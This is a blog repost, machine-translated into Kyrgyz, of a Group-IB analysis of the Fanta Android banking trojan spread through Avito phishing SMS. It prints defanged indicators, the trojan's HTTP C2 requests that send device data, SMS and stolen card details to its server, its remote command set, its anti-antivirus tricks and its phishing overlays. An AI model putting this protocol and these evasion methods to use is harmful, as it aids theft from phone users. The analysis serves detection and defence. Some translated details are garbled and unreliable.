ProHoster > Blog > интернет жаңылыктары > Leisya, Fanta: эски Android троянынын жаңы тактикасы

Leisya, Fanta: эски Android троянынын жаңы тактикасы

Leisya, Fanta: эски Android троянынын жаңы тактикасы

Бир күнү сиз Avitoдо бир нерсени саткыңыз келет жана продуктуңуздун толук сүрөттөлүшүн (мисалы, RAM модулу) жайгаштыргандан кийин, сиз бул билдирүүнү аласыз:

Leisya, Fanta: эски Android троянынын жаңы тактикасыШилтемени ачкандан кийин, сизге, бактылуу жана ийгиликтүү сатуучуга, сатып алуу жасалгандыгы тууралуу билдирүүчү зыянсыздай көрүнгөн баракты көрөсүз:

Leisya, Fanta: эски Android троянынын жаңы тактикасы
"Улантуу" баскычын басканда, Android түзмөгүңүзгө сөлөкөтү жана ишенимдүү аталышы бар APK файлы жүктөлөт. Сиз кандайдыр бир себептерден улам AccessibilityService укуктарын сураган тиркемени орнотуп койдуңуз, андан кийин бир нече терезе пайда болуп, тез эле жок болду жана... Болду.

Сиз балансыңызды текшерүү үчүн барасыз, бирок кандайдыр бир себептерден улам банктык колдонмоңуз картаңыздын реквизиттерин кайра сурайт. Маалыматтарды киргизгенден кийин, коркунучтуу нерсе болот: кандайдыр бир себептерден улам, сиз үчүн дагы эле түшүнүксүз, акча эсебиңизден жок боло баштайт. Сиз көйгөйдү чечүүгө аракет кылып жатасыз, бирок телефонуңуз туруштук берет: ал "Артка" жана "Башкы бет" баскычтарын басып, өчпөйт жана кандайдыр бир коопсуздук чараларын иштетүүгө мүмкүндүк бербейт. Жыйынтыгында акчасыз каласыз, товарыңыз алынбай калып, аң-таң болуп, таң каласыз: эмне болду?

Жооп жөнөкөй: сиз Flexnet үй-бүлөсүнүн мүчөсү болгон Android Trojan Fantaнын курмандыгы болуп калдыңыз. Бул кантип болду? Келгиле азыр түшүндүрүп берели.

Авторлор: Андрей Половинкин, зыяндуу программаларды талдоо боюнча кенже адис, Иван Писарев, кесепеттүү программаларды талдоо боюнча адис.

Кээ бир статистика

Android трояндарынын Flexnet үй-бүлөсү биринчи жолу 2015-жылы белгилүү болгон. Узак мөөнөттүү ишмердүүлүктүн ичинде үй-бүлө бир нече түрчөлөргө кеңейген: Fanta, Limebot, Lipton ж. Троян, ошондой эле аны менен байланышкан инфраструктура дагы токтобойт: жаңы натыйжалуу бөлүштүрүү схемалары иштелип чыгууда - биздин учурда белгилүү бир колдонуучу-сатуучуга багытталган жогорку сапаттагы фишинг барактар, ал эми троянды иштеп чыгуучулар модалуу тенденцияларды ээрчишет. вирус жазуу - жуккан түзмөктөрдөн акчаны натыйжалуу уурдоого жана коргоо механизмдерин айланып өтүүгө мүмкүндүк берген жаңы функцияларды кошуу.

Бул макалада сүрөттөлгөн кампания Орусиядан келген колдонуучуларга багытталган, Украинада жуккан аппараттардын аз саны, ал эми Казакстан менен Беларуста андан да азы катталган.

Flexnet Android троян аренасында 4 жылдан ашык убакыттан бери иштеп, көптөгөн изилдөөчүлөр тарабынан кылдат изилденгенине карабастан, ал дагы деле жакшы абалда. 2019-жылдын январь айынан баштап зыяндын потенциалдуу суммасы 35 миллион рублдан ашат - бул Орусиядагы кампаниялар үчүн гана. 2015-жылы бул Android троянынын ар кандай версиялары жер астындагы форумдарда сатылган, ал жерден толук сүрөттөлүшү менен трояндын баштапкы кодун табууга болот. Бул дүйнөдөгү зыяндын статистикасы дагы таасирдүү экенин билдирет. Мындай карыя үчүн жаман көрсөткүч эмес, туурабы?

Leisya, Fanta: эски Android троянынын жаңы тактикасы

Сатуудан баштап алдамчылыкка чейин

Avito жарнамаларын жайгаштыруу үчүн интернет-сервис үчүн фишинг баракчасынын мурда берилген скриншотунан көрүнүп тургандай, ал белгилүү бир жабырлануучу үчүн даярдалган. Сыягы, чабуулчулар Avito талдоочуларынын бирин колдонушат, ал сатуучунун телефон номерин жана аты-жөнүн, ошондой эле продуктунун сүрөттөмөсүн чыгарат. Баракты кеңейтип, APK файлын даярдагандан кийин, жабырлануучуга анын аты-жөнү жана анын продуктунун сыпаттамасы жана продуктунун "сатуудан" түшкөн суммасы камтылган фишинг баракчасына шилтеме көрсөтүлгөн SMS жөнөтүлөт. Баскычты басуу менен колдонуучу зыяндуу APK файлын алат - Fanta.

shcet491[.]ru доменин изилдөө анын Hostingerдин DNS серверлерине берилгендигин көрсөттү:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

Домен аймагынын файлы 31.220.23[.]236, 31.220.23[.]243 жана 31.220.23[.]235 IP даректерин көрсөткөн жазууларды камтыйт. Бирок, домендин негизги ресурстук жазуусу (А жазуусу) 178.132.1[.]240 IP дареги бар серверди көрсөтөт.

IP дареги 178.132.1[.]240 Нидерландыда жайгашкан жана хосттерге таандык WorldStream. IP даректери 31.220.23[.]235, 31.220.23[.]236 жана 31.220.23[.]243 Улуу Британияда жайгашкан жана HOSTINGER жалпы хостинг серверине таандык. Жазгыч катары колдонулат openprov-ру. Төмөнкү домендер 178.132.1[.]240 IP дарегине чечилген:

  • sdelka-ru[.]ru
  • tovar-av[.]ru
  • ав-товар[.]ру
  • ru-sdelka[.]ru
  • shcet382[.]ru
  • sdelka221[.]ru
  • sdelka211[.]ru
  • vyplata437[.]ru
  • viplata291[.]ru
  • perevod273[.]ru
  • perevod901[.]ru

Төмөнкү форматтагы шилтемелер дээрлик бардык домендерден жеткиликтүү болгонун белгилей кетүү керек:

http://(www.){0,1}<%domain%>/[0-9]{7}

Бул шаблон ошондой эле SMS билдирүүсүнөн шилтемени камтыйт. Тарыхый маалыматтардын негизинде, бир домен жогоруда сүрөттөлгөн үлгүдөгү бир нече шилтемелерге туура келери аныкталды, бул бир домен троянды бир нече курмандыктарга таратуу үчүн колдонулганын көрсөтүп турат.

Келгиле, алдыга бир аз секирип көрөлү: SMSтен шилтеме аркылуу жүктөлгөн троян даректи башкаруу сервери катары колдонот onsedseddohap[.]клуб. Бул домен 2019-03-12 катталган жана 2019-04-29 баштап APK колдонмолору бул домен менен иштешкен. VirusTotal алынган маалыматтардын негизинде, бул сервер менен жалпысынан 109 тиркеме иштешкен. Домендин өзү IP дарегине чечилди 217.23.14[.]27, Нидерландыда жайгашкан жана хосттерге таандык WorldStream. Жазгыч катары колдонулат namecheap. Домендер да ушул IP дарекке чечилет bad-racoon[.]клуб (2018-09-25 баштап) жана bad-racoon[.]жашоо (2018-10-25-ж. баштап). Домен менен bad-racoon[.]клуб 80ден ашык APK файлдары менен иштешкен bad-racoon[.]жашоо - 100дөн ашык.

Жалпысынан алганда, чабуул төмөндөгүдөй болот:

Leisya, Fanta: эски Android троянынын жаңы тактикасы

Фантанын капкагынын астында эмне бар?

Башка көптөгөн Android трояндары сыяктуу эле, Fanta SMS билдирүүлөрдү окууга жана жөнөтүүгө, USSD суроо-талаптарын аткарууга жана тиркемелердин (анын ичинде банктык терезелерди) үстүнө өзүнүн терезелерин көрсөтүүгө жөндөмдүү. Бирок, бул үй-бүлөнүн функционалдык арсеналы келди: Fanta колдоно баштады AccessibilityService ар кандай максаттар үчүн: башка колдонмолордон эскертмелердин мазмунун окуу, жуккан түзмөктө троянды аныктоо жана аткарууну токтотуу ж.б. Fanta Android'дин 4.4 жаштан кем эмес бардык версияларында иштейт. Бул макалада биз төмөнкү Fanta үлгүсүн кененирээк карап чыгабыз:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Ишке киргизгенден кийин дароо

Ишке киргизгенден кийин дароо троян өзүнүн сөлөкөтүн жашырат. Тиркеме вирус жуккан аппараттын аты тизмеде жок болгондо гана иштей алат:

  • android_x86
  • VirtualBox
  • Nexus 5X(бука)
  • Nexus 5(устара)

Бул текшерүү трояндын негизги кызматында жүргүзүлөт - MainService. Биринчи жолу ишке киргизилгенде, тиркеменин конфигурациясынын параметрлери демейки маанилерге инициализацияланат (конфигурация маалыматтарын сактоо форматы жана алардын мааниси кийинчерээк талкууланат) жана жаңы жуккан аппарат башкаруу серверинде катталат. Кабардын түрү менен HTTP POST сурамы серверге жөнөтүлөт register_bot жана жуккан түзмөк жөнүндө маалымат (Android версиясы, IMEI, телефон номери, оператордун аты жана оператор катталган өлкөнүн коду). Дарек башкаруу сервери катары кызмат кылат hXXp://onuseseddohap[.]club/controller.php. Жооп катары сервер талааларды камтыган билдирүү жөнөтөт bot_id, bot_pwd, Server — колдонмо бул баалуулуктарды CnC серверинин параметрлери катары сактайт. Параметр Server талаа кабыл алынбаса, кошумча: Fanta каттоо дарегин колдонот - hXXp://onuseseddohap[.]club/controller.php. CnC дарегин өзгөртүү функциясы эки маселени чечүү үчүн колдонулушу мүмкүн: жүктү бир нече серверлердин ортосунда бирдей бөлүштүрүү (эгер вирус жуккан түзмөктөрдүн көп саны болсо, оптимизацияланбаган веб-сервердеги жүк жогору болушу мүмкүн), ошондой эле колдонуу CnC серверлеринин бири иштен чыккан учурда альтернативдүү сервер.

Сурам жөнөтүүдө ката кетсе, троян каттоо процессин 20 секунддан кийин кайталайт.

Түзмөк ийгиликтүү катталгандан кийин, Fanta колдонуучуга төмөнкү билдирүүнү көрсөтөт:

Leisya, Fanta: эски Android троянынын жаңы тактикасы
Маанилүү эскертүү: кызмат чакырды системасы коопсуздук — троян сервисинин аталышы жана кнопканы басканда OK Вирус жуккан түзмөктүн Атайын мүмкүнчүлүктөр жөндөөлөрү менен терезе ачылат, анда колдонуучу зыяндуу кызмат үчүн Атайын мүмкүнчүлүктөр укуктарын бериши керек:

Leisya, Fanta: эски Android троянынын жаңы тактикасы
Колдонуучу күйгүзүлгөндө AccessibilityService, Fanta колдонмо терезелеринин мазмунуна жана аларда аткарылган аракеттерге мүмкүнчүлүк алат:

Leisya, Fanta: эски Android троянынын жаңы тактикасы
Жеткиликтүүлүк укуктарын алгандан кийин, троян администратордук укуктарды жана эскертмелерди окуу укугун сурайт:

Leisya, Fanta: эски Android троянынын жаңы тактикасы
AccessibilityService колдонуу менен, колдонмо баскычтарды басууларды окшоштурат, ошону менен өзүнө бардык керектүү укуктарды берет.

Fanta конфигурация маалыматтарын, ошондой эле инфекция жуккан түзмөк жөнүндө процессте чогултулган маалыматты сактоо үчүн зарыл болгон бир нече маалымат базасын түзөт (алар кийинчерээк сүрөттөлөт). Топтолгон маалыматты жөнөтүү үчүн троян маалымат базасынан талааларды жүктөө жана башкаруу серверинен буйрукту алуу үчүн иштелип чыккан кайталануучу тапшырманы түзөт. CnCге кирүү аралыгы Android версиясына жараша белгиленет: 5.1 учурда интервал 10 секунд, болбосо 60 секунд болот.

Команданы алуу үчүн, Fanta өтүнүч берет GetTask башкаруу серверине. Жооп катары, CnC төмөнкү буйруктардын бирин жөнөтө алат:

команда баяндоо
0 SMS билдирүү жөнөтүү
1 Телефон чалуу же USSD буйругун жасаңыз
2 Параметрди жаңылайт аралык
3 Параметрди жаңылайт тосуу
6 Параметрди жаңылайт smsManager
9 SMS билдирүүлөрдү чогулта баштаңыз
11 Телефонуңузду заводдук жөндөөлөргө кайтарыңыз
12 Диалог кутусун түзүү журналын иштетүү/өчүрүү

Fanta ошондой эле 70 банктык колдонмолордон, тез төлөм системаларынан жана электрондук капчыктардан эскертмелерди чогултуп, маалымат базасында сактайт.

Конфигурация параметрлерин сактоо

Конфигурация параметрлерин сактоо үчүн Fanta Android платформасы үчүн стандарттуу ыкманы колдонот - Түзөтүүлөр-файлдар. Орнотуулар аталган файлга сакталат орнотуулары. Сакталган параметрлердин сүрөттөлүшү төмөнкү таблицада.

ысым Демейки маани Мүмкүн болгон баалуулуктар баяндоо
id 0 бүтүн Bot ID
Server hXXp://onuseseddohap[.]club/ URL Сервердин дарегин көзөмөлдөө
сырсөздү - аркан Сервер сырсөзү
аралык 20 бүтүн Убакыт аралыгы. Төмөнкү милдеттерди аткаруу канча убакытка кийинкиге калтырылышы керектигин көрсөтөт:

  • Жөнөтүлгөн SMS билдирүүнүн абалы жөнүндө суроо-талапты жөнөтүүдө
  • Башкаруу серверинен жаңы буйрукту алуу
тосуу бардык all/telNumber Эгерде талаа сапка барабар болсо бардык же телNumber, анда алынган SMS билдирүү колдонмо тарабынан кармалып, колдонуучуга көрсөтүлбөйт
smsManager 0 0/1 Демейки SMS алуучу катары тиркемени иштетүү/өчүрүү
readDialog жалган True/false Окуяларды каттоону иштетүү/өчүрүү AccessibilityEvent

Fanta да файлды колдонот smsManager:

ысым Демейки маани Мүмкүн болгон баалуулуктар баяндоо
pckg - аркан Колдонулган SMS билдирүү башкаргычынын аты

Маалымат базалары менен өз ара аракеттенүү

Троян өзүнүн иштөө учурунда эки маалымат базасын колдонот. Маалымат базасы аталган a телефондон чогултулган ар кандай маалыматты сактоо үчүн колдонулат. Экинчи маалымат базасы аталган fanta.db жана банк карталары жөнүндө маалыматты чогултуу үчүн арналган фишинг терезелерин түзүүгө жооптуу орнотууларды сактоо үчүн колдонулат.

Троян маалымат базасын колдонот а чогултулган маалыматты сактоо жана аракеттериңизди каттоо үчүн. Маалыматтар таблицада сакталат | журналдар |. Таблица түзүү үчүн, төмөнкү SQL сурамын колдонуңуз:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

Маалыматтар базасы төмөнкү маалыматтарды камтыйт:

1. Вирус жуккан аппаратты билдирүү менен ишке киргизүү Телефон күйгүзүлдү!

2. Тиркемелерден билдирмелер. Билдирүү төмөнкү шаблон боюнча түзүлөт:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Троян тарабынан түзүлгөн фишинг формаларынан банк картасынын маалыматтары. Параметр VIEW_NAME төмөнкүлөрдүн бири болушу мүмкүн:

  • AliExpress
  • Достору pantera_chernaya.ru
  • Google Play
  • Ар кандай

Билдирүү төмөнкү форматта жазылат:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Кирүүчү/чыгыш SMS билдирүүлөрү төмөнкү форматта:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Форматта диалог терезесин түзгөн пакет жөнүндө маалымат:

(<%Package name%>)<%Package information%>

Мисал таблица | журналдар |:

Leisya, Fanta: эски Android троянынын жаңы тактикасы
Fanta функцияларынын бири банк карталары жөнүндө маалыматтарды чогултуу болуп саналат. Маалыматтарды чогултуу банктык тиркемелерди ачууда фишинг терезелерин түзүү аркылуу ишке ашат. Троян фишинг терезесин бир гана жолу жаратат. Терезе колдонуучуга көрсөтүлгөн маалымат таблицада сакталат орнотуулары маалымат базасында fanta.db. Маалыматтар базасын түзүү үчүн, төмөнкү SQL сурамын колдонуңуз:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Бардык таблица талаалары орнотуулары демейки боюнча 1ге инициализацияланган (фишинг терезесин түзүү). Колдонуучу өз маалыматтарын киргизгенден кийин, маани 0 болуп орнотулат. Таблица талааларынын мисалы орнотуулары:

  • can_login — талаа банктык арызды ачууда форманы көрсөтүү үчүн жооптуу
  • биринчи_банк - колдонулбайт
  • can_avito — талаа Avito тиркемесин ачууда форманы көрсөтүү үчүн жооптуу
  • can_ali — талаа Aliexpress тиркемесин ачууда форманы көрсөтүү үчүн жооптуу
  • башка_болот — талаа тизмеден кандайдыр бир тиркемени ачууда форманы көрсөтүү үчүн жооптуу: Yula, Pandao, Drom Auto, Wallet. Арзандатуу жана бонустук карталар, Aviasales, Booking, Trivago
  • can_card — талаа ачылганда форманы көрсөтүү үчүн жооптуу Google Play

Башкаруу сервери менен өз ара аракеттенүү

Башкаруу сервери менен тармактык өз ара аракеттенүү HTTP протоколу аркылуу ишке ашат. Тармак менен иштөө үчүн Fanta популярдуу Retrofit китепканасын колдонот. Сурамдар төмөнкү дарекке жөнөтүлөт: hXXp://onuseseddohap[.]club/controller.php. Серверде катталып жатканда сервердин дарегин өзгөртүүгө болот. Cookie файлдары серверден жооп катары жөнөтүлүшү мүмкүн. Fanta серверге төмөнкү суроо-талаптарды жасайт:

  • Ботту башкаруу серверинде каттоо биринчи жолу ишке киргизилгенде бир жолу ишке ашат. Вирус жуккан түзмөк тууралуу төмөнкү маалыматтар серверге жөнөтүлөт:
    · Cookie — серверден алынган кукилер (демейки маани – бош сап)
    · режими — сап туруктуу register_bot
    · префикс — бүтүн сан константасы 2
    · version_sdk — төмөнкү шаблон боюнча түзүлөт: /(Avit)
    · IMEI — жуккан аппараттын IMEI
    · мамлекет — оператор катталган өлкөнүн коду, ISO форматында
    · сан - телефон номуру
    · оператору - оператордун аты

    Серверге жөнөтүлгөн сурамдын мисалы:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>

    Сурамга жооп катары сервер төмөнкү параметрлерди камтыган JSON объектин кайтарышы керек:
    · bot_id — жуккан аппараттын идентификатору. Эгерде bot_id 0гө барабар болсо, Fanta өтүнүчтү кайра аткарат.
    bot_pwd — сервер үчүн сырсөз.
    сервер — сервердин дарегин башкаруу. Кошумча параметр. Эгер параметр көрсөтүлбөсө, тиркемеде сакталган дарек колдонулат.

    JSON объектиси:

    {
    "response":[
   	 {
   		 "bot_id": <%BOT_ID%>,
   		 "bot_pwd": <%BOT_PWD%>,
   		 "server": <%SERVER%>
   	 }
    ],
    "status":"ok"
}

  • Серверден буйрук алууну сураныңыз. Төмөнкү маалыматтар серверге жөнөтүлөт:
    · Cookie — серверден алынган кукилер
    · тендердик — суроо-талапты жөнөтүүдө алынган жуккан аппараттын идентификатору register_bot
    · сырсөздү - сервер үчүн сырсөз
    · divice_admin — талаа администратордук укуктар алынганын аныктайт. Эгерде администратордун укуктары алынган болсо, талаа ге барабар 1башкача 0
    · мүмкүндүк алуу — Жеткиликтүүлүк кызматынын иштөө абалы. Кызмат башталган болсо, анда мааниси болуп саналат 1башкача 0
    · SMSManager — троян SMS алуу үчүн демейки тиркеме катары иштетилгенин көрсөтөт
    · экран — экран кандай абалда экенин көрсөтөт. Маани коюлат 1, экран күйгүзүлсө, антпесе 0;

    Серверге жөнөтүлгөн сурамдын мисалы:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    Буйрукка жараша сервер ар кандай параметрлери бар JSON объектисин кайтара алат:

    · команда SMS билдирүү жөнөтүү: Параметрлер телефон номерин, SMS билдирүүнүн текстин жана жөнөтүлүп жаткан кабардын ID'син камтыйт. Идентификатор түрү менен серверге билдирүү жөнөтүүдө колдонулат setSmsStatus. 

    {
    "response":
    [
   	 {
   		 "mode": 0,
   		 "sms_number": <%SMS_NUMBER%>,
   		 "sms_text": <%SMS_TEXT%>,
   		 "sms_id": %SMS_ID%
   	 }
    ],
    "status":"ok"
}

    · команда Телефон чалуу же USSD буйругун жасаңыз: Телефон номери же буйрук жооп корпусунда келет. 

    {
    "response":
    [
   	 {
   		 "mode": 1,
   		 "command": <%TEL_NUMBER%>
   	 }
    ],
    "status":"ok"
}

    · команда Интервал параметрин өзгөртүү. 

    {
    "response":
    [
   	 {
   		 "mode": 2,
   		 "interval": <%SECONDS%>
   	 }
    ],
    "status":"ok"
}

    · команда Intercept параметрин өзгөртүү. 

    {
    "response":
    [
   	 {
   		 "mode": 3,
   		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
   	 }
    ],
    "status":"ok"
}

    · команда SmsManager талаасын өзгөртүү. 

    {
    "response":
    [
   	 {
   		 "mode": 6,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

    · команда Вирус жуккан түзмөктөн SMS билдирүүлөрдү чогултуңуз.

    {
    "response":
    [
   	 {
   		 "mode": 9
   	 }
    ],
    "status":"ok"
}

    · команда Телефонуңузду заводдук жөндөөлөргө кайтарыңыз: 

    {
    "response":
    [
   	 {
   		 "mode": 11
   	 }
    ],
    "status":"ok"
}

    · команда ReadDialog параметрин өзгөртүү. 

    {
    "response":
    [
   	 {
   		 "mode": 12,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

  • түрү менен билдирүү жөнөтүү setSmsStatus. Бул өтүнүч буйрук аткарылгандан кийин жасалат SMS билдирүү жөнөтүү. Сурам мындай көрүнөт:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • Маалымат базасынын мазмунун жүктөө. Ар бир суроо үчүн бир катар өткөрүлөт. Төмөнкү маалыматтар серверге жөнөтүлөт:
    · Cookie — серверден алынган кукилер
    · режими — сап туруктуу setSaveInboxSms
    · тендердик — суроо-талапты жөнөтүүдө алынган жуккан аппараттын идентификатору register_bot
    · текст — учурдагы маалыматтар базасынын жазуусундагы текст (талаа d столдон | журналдар | маалымат базасында а)
    · сан — учурдагы маалыматтар базасынын жазуусунун аталышы (талаа p столдон | журналдар | маалымат базасында а)
    · sms_rejimi - бүтүн сан (талаа m столдон | журналдар | маалымат базасында а)

    Сурам мындай көрүнөт:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    Эгерде серверге ийгиликтүү жөнөтүлсө, сап таблицадан өчүрүлөт. Сервер кайтарган JSON объектинин мисалы:

    {
    "response":[],
    "status":"ok"
}

AccessibilityService менен өз ара аракеттенүү

AccessibilityService Android түзмөктөрүн майыптар үчүн колдонууну жеңилдетүү үчүн ишке ашырылган. Көпчүлүк учурларда, физикалык өз ара тиркеме менен иштешүү үчүн талап кылынат. AccessibilityService аларды программалык түрдө жасоого мүмкүндүк берет. Fanta бул кызматты банктык тиркемелерде жасалма терезелерди түзүү жана колдонуучулардын системанын жөндөөлөрүн жана айрым тиркемелерди ачуусуна бөгөт коюу үчүн колдонот.

AccessibilityService функциясын колдонуу менен троян вирус жуккан аппараттын экранындагы элементтердин өзгөрүүлөрүн көзөмөлдөйт. Мурда сүрөттөлгөндөй, Fanta орнотуулары диалог кутучалары менен операцияларды каттоо үчүн жооптуу параметрди камтыйт - readDialog. Эгер бул параметр коюлса, окуяга түрткү болгон пакеттин аталышы жана сүрөттөлүшү жөнүндө маалымат маалымат базасына кошулат. Троян окуялар башталганда төмөнкү аракеттерди аткарат:

  • Төмөнкү учурларда артка жана үй баскычтарын басууну окшоштурат:
    · колдонуучу өзүнүн түзмөгүн кайра жүктөөнү кааласа
    · колдонуучу "Avito" тиркемесин жок кылгысы келсе же жетүү укуктарын өзгөрткүсү келсе
    · баракта "Avito" колдонмосу жөнүндө сөз бар болсо
    · Google Play Protect тиркемесин ачууда
    · AccessibilityService жөндөөлөрү менен баракчаларды ачканда
    · Системанын коопсуздугу диалог кутусу пайда болгондо
    · "Башка колдонмонун үстүнөн тартуу" жөндөөлөрү менен баракты ачып жатканда
    · "Колдонмолор" барагын ачканда, "Калыбына келтирүү жана баштапкы абалга келтирүү", "Маалыматтарды кайра орнотуу", "Орнотууларды баштапкы абалга келтирүү", "Иштеп чыгуучу панели", "Атайын. мүмкүнчүлүктөр”, “Өзгөчө мүмкүнчүлүктөр”, “Өзгөчө укуктар”
    · окуя белгилүү колдонмолор тарабынан түзүлгөн болсо.

    Тиркемелердин тизмеси

    • андроид
    • Master Lite
    • Таза Master
    • x86 CPU үчүн таза мастер
    • Meizu Колдонмо Уруксат башкаруу
    • MIUI Коопсуздук
    • Таза мастер - Антивирус жана кэш жана таштанды тазалоочу
    • Ата-энелик көзөмөл жана GPS: Kaspersky SafeKids
    • Kaspersky Antivirus AppLock & Web Security Бета
    • Вирус тазалоочу, антивирус, тазалоочу (MAX коопсуздук)
    • Mobile AntiVirus Security PRO
    • Avast антивирусу жана бекер коргоо 2019
    • Мобилдик коопсуздук MegaFon
    • Xperia үчүн AVG коргоо
    • Мобилдик коопсуздук
    • Зыяндуу программа антивирус жана коргоо
    • Android 2019 үчүн антивирус
    • Коопсуздук мастери - Антивирус, VPN, AppLock, Booster
    • Huawei планшет системасынын менеджери үчүн AVG антивирусу
    • Samsung жеткиликтүүлүгү
    • Samsung Smart Manager
    • Коопсуздук Master
    • Тез Booster
    • dr.web
    • Dr.Web коопсуздук мейкиндиги
    • Dr.Web мобилдик башкаруу борбору
    • Dr.Web Коопсуздук Space Life
    • Dr.Web мобилдик башкаруу борбору
    • Антивирус жана мобилдик коопсуздук
    • Kaspersky Internet Security: Антивирус жана коргоо
    • Касперскийдин батареянын иштөө мөөнөтү: үнөмдөөчү жана күчөткүч
    • Kaspersky Endpoint Security - коргоо жана башкаруу
    • AVG Antivirus акысыз 2019 – Android үчүн коргоо
    • Android антивирус
    • Norton Mobile Коопсуздук жана Антивирус
    • Антивирус, брандмауэр, VPN, мобилдик коопсуздук
    • Мобилдик коопсуздук: антивирус, VPN, уурулуктан коргоо
    • Android үчүн антивирус

  • Эгер кыска номерге SMS жөнөтүүдө уруксат суралса, Fanta кутучаны чыкылдатууну окшоштурат. Тандоо эсиңизде болсун жана баскыч жөнөтүү.
  • Трояндан администратордук укуктарды алып салууга аракет кылганыңызда, ал телефондун экранын бекитет.
  • Жаңы администраторлорду кошууга жол бербейт.
  • Эгерде антивирустук тиркеме dr.web коркунуч аныкталган, Fanta баскычын басып туурайт көңүл бурбоо.
  • Троян, эгер окуя колдонмо тарабынан түзүлгөн болсо, артка жана үй баскычын басууну симуляциялайт Samsung Device Care.
  • Fanta 30га жакын ар кандай интернет кызматтарынын тизмесинен тиркеме ишке кирсе, банк карталары жөнүндө маалыматтарды киргизүү формалары менен фишинг терезелерин түзөт. Алардын арасында: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, ж.б.

    Фишинг формалары

    Fanta вирус жуккан түзмөктө кайсы колдонмолор иштеп жатканын талдайт. Кызыккан тиркеме ачылган болсо, троян башкалардын үстүнө фишинг терезесин көрсөтөт, бул банк картасынын маалыматын киргизүү формасы. Колдонуучу төмөнкү маалыматтарды киргизиши керек:

    • Картанын номери
    • Картанын жарактуулук мөөнөтү
    • Каршияка
    • Карта ээсинин аты (бардык банктар үчүн эмес)

    Иштеп жаткан тиркемеге жараша ар кандай фишинг терезелери көрсөтүлөт. Төмөндө алардын айрымдарынын мисалдары келтирилген:

    AliExpress:

    Leisya, Fanta: эски Android троянынын жаңы тактикасы
    Авито:

    Leisya, Fanta: эски Android троянынын жаңы тактикасы
    Кээ бир башка колдонмолор үчүн, мис. Google Play Market, Aviasales, Pandao, Booking, Trivago:
    Leisya, Fanta: эски Android троянынын жаңы тактикасы

    Чынында кандай болгон

    Бактыга жараша, макаланын башында айтылган СМС билдирүүнү алган адам киберкоопсуздук боюнча адис болуп чыкты. Демек, чыныгы, режиссёр эмес версия мурда айтылгандан айырмаланат: адам кызыктуу SMS алды, андан кийин ал Group-IB Threat Hunting Intelligence командасына берди. Кол салуунун натыйжасы бул макала. Бактылуу аягы, туурабы? Бирок, бардык окуялар ийгиликтүү аяктай бербейт, жана сиздики акчаны жоготуу менен директордун кесилишине окшоп калбашы үчүн, көпчүлүк учурда төмөнкү көпкө чейин сүрөттөлгөн эрежелерди сактоо жетиштүү:

    • Google Play'ден башка булактардан Android OS менен мобилдик түзмөккө тиркемелерди орнотпоңуз
    • Тиркемени орнотууда, тиркеме сураган укуктарга өзгөчө көңүл буруңуз
    • жүктөлгөн файлдардын кеңейтүүлөрүнө көңүл буруңуз
    • Android OS жаңыртууларын үзгүлтүксүз орнотуу
    • шектүү ресурстарга кирбеңиз жана ал жерден файлдарды жүктөп албаңыз
    • SMS билдирүүлөрүндө алынган шилтемелерди баспаңыз.

Source: www.habr.com

Комментарий кошуу